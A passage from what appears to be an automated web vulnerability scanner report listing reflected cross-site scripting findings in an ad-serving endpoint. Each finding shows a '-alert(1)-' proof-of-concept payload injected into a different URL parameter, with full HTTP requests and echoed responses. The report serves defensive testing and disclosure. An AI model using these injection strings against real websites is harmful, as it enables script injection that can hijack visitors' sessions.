User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:12:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6913

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:11:31 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=9600a"-alert(1)-"d571cc2dd60&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.150723.CBSI&utm_medium=oa");
var fsc
...[SNIP]...

1.5. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922 [cpnmodule parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922

Issue detail

The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8fc0c"-alert(1)-"c3d973c4897 was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=8fc0c"-alert(1)-"c3d973c4897&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:12:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6913

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:12:10 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
5%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=8fc0c"-alert(1)-"c3d973c4897&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.150723.CBSI&utm_medium=oa");

...[SNIP]...

1.6. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922 [e parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922

Issue detail

The value of the e request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efeff"-alert(1)-"757feda799a was submitted in the e parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3efeff"-alert(1)-"757feda799a&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:10:11 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6914

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
38009996/38027753/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3efeff"-alert(1)-"757feda799a&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://
...[SNIP]...

1.7. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922 [epartner parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922

Issue detail

The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e9c4"-alert(1)-"0b886bae39e was submitted in the epartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=2e9c4"-alert(1)-"0b886bae39e&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:11:19 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6913

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:12:10 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=2e9c4"-alert(1)-"0b886bae39e&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na
...[SNIP]...

1.8. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922 [event parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922

Issue detail

The value of the event request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84813"-alert(1)-"890b6b1225 was submitted in the event parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=84813"-alert(1)-"890b6b1225 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6897
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 22 Nov 2010 00:13:43 GMT
Expires: Mon, 22 Nov 2010 00:13:43 GMT

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:11:31 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=84813"-alert(1)-"890b6b1225http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.150723.CBSI&utm_medium=oa");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg =
...[SNIP]...

1.9. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922 [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 766b0"-alert(1)-"ab23b56765f was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn766b0"-alert(1)-"ab23b56765f&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:05:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6913

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:11:31 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
/3a5a/17/181/%2a/z%3B231241976%3B1-0%3B0%3B55844876%3B4307-300/250%3B38009999/38027756/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn766b0"-alert(1)-"ab23b56765f&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.
...[SNIP]...

1.10. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922 [l parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f565a"-alert(1)-"9d4fb7009e3 was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_USf565a"-alert(1)-"9d4fb7009e3&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:06:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6913

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:12:10 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
/k%3B231241976%3B2-0%3B0%3B55844876%3B4307-300/250%3B38010001/38027758/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_USf565a"-alert(1)-"9d4fb7009e3&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI
...[SNIP]...

1.11. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922 [nd parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922

Issue detail

The value of the nd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b891f"-alert(1)-"1810bff2486 was submitted in the nd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080b891f"-alert(1)-"1810bff2486&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:08:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6913

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:12:10 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
%3B55844876%3B4307-300/250%3B38010001/38027758/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080b891f"-alert(1)-"1810bff2486&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11
...[SNIP]...

1.12. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922 [o parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922

Issue detail

The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ccc4"-alert(1)-"9b23ea1ba4b was submitted in the o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a8ccc4"-alert(1)-"9b23ea1ba4b&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:04:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6913

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:11:31 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
%3Dv8/3a5a/17/181/%2a/z%3B231241976%3B1-0%3B0%3B55844876%3B4307-300/250%3B38009999/38027756/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a8ccc4"-alert(1)-"9b23ea1ba4b&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121
...[SNIP]...

1.13. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922 [oepartner parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922

Issue detail

The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fad38"-alert(1)-"c08febe9059 was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=fad38"-alert(1)-"c08febe9059&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:11:04 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6913

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:11:31 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=fad38"-alert(1)-"c08febe9059&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_sourc
...[SNIP]...

1.14. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922 [orh parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922

Issue detail

The value of the orh request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8bca5"-alert(1)-"629032b61be was submitted in the orh parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com8bca5"-alert(1)-"629032b61be&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:10:46 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6914

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
